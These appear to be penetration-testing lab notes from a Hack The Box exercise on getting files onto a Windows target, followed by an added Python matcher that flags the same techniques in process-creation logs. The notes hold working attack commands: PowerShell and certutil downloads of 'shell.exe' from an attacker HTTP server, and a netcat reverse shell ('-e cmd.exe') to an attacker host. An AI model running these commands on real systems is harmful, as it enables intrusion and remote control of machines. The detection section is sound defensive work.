Windows file transfer
smbserver:
- Start the server:
- python2 /usr/share/doc/python3-impacket/examples/smbserver.py share /root/Desktop/HTB/Bastard
- impacket-smbserver share .
- Transfer the file to Windows
- copy \\10.10.14.5\share\shell.exe . //copy shell.exe to the local directory
- \\10.10.14.5\share\nc.exe 10.10.14.5 6666 -e cmd.exe //run nc.exe from the share on 10.10.14.5 and connect to 10.10.14.5 on port 6666
powershell:
- Transfer the file to Windows
- python2 -m SimpleHTTPServer 8888 //run on the attacking machine
- powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.6:8888/shell.exe', 'c:\Users\Public\Downloads\shell.exe')" //run on the victim machine
certutil.exe:
- python2 -m SimpleHTTPServer 8888 //run on the attacking machine
- certutil.exe -urlcache -split -f http://10.10.14.5:8888/shell.exe shell.exe //run on the victim machine
Windows privilege escalation
- searchsploit Windows Server 2003 | grep -i priv --color
Windows NC.exe
- nc connects back to the Linux host
- impacket-smbserver share /usr/share/windows-resources/binaries/
- \\10.10.14.5\share\nc.exe 10.10.14.5 6666 -e cmd.exe
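
Detection view of the transfer methods in these notes, as an added example that is not part of the original notes: a small matcher run over process command lines (such as those recorded in process-creation logs). The rule names, host names and the "IP-literal UNC path" heuristic are assumptions, and the sample events are constructed from the command lines above.

```python
import re

# Heuristic patterns for the transfer techniques in these notes (assumed rule names).
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b.*https?://", re.I)),
    ("powershell_webclient_downloadfile",
     re.compile(r"\bpowershell(?:\.exe)?\b.*net\.webclient.*downloadfile\s*\(", re.I)),
    # UNC paths that use a raw IP instead of a host name are unusual for real file servers.
    ("copy_from_ip_unc_share",
     re.compile(r"\bcopy\s+\\\\\d{1,3}(?:\.\d{1,3}){3}\\", re.I)),
    ("exec_from_ip_unc_share",
     re.compile(r'^\s*"?\\\\\d{1,3}(?:\.\d{1,3}){3}\\\S+\.exe\b', re.I)),
]

def detect(cmdline):
    """Return the names of all rules that match one process command line."""
    # Normalise typographic quotes that creep in when commands are pasted from notes.
    norm = cmdline.translate(str.maketrans("“”‘’", "\"\"''"))
    return [name for name, rx in RULES if rx.search(norm)]

def scan(events):
    """Return (host, rule) pairs for every hit in a list of process events."""
    return [(e["host"], rule) for e in events for rule in detect(e["cmdline"])]

# Constructed sample events: hypothetical hosts, command lines taken from the notes,
# plus two benign lines that must not alert.
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": r"copy \\10.10.14.5\share\shell.exe ."},
    {"host": "WS01", "cmdline": r"\\10.10.14.5\share\nc.exe 10.10.14.5 6666 -e cmd.exe"},
    {"host": "WS02", "cmdline": r'''powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.6:8888/shell.exe', 'c:\Users\Public\Downloads\shell.exe')"'''},
    {"host": "WS03", "cmdline": r"certutil.exe -urlcache -split -f http://10.10.14.5:8888/shell.exe shell.exe"},
    {"host": "WS04", "cmdline": r"certutil -hashfile shell.exe SHA256"},
    {"host": "WS04", "cmdline": r"copy \\fileserver\share\report.docx ."},
]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(host, rule)
```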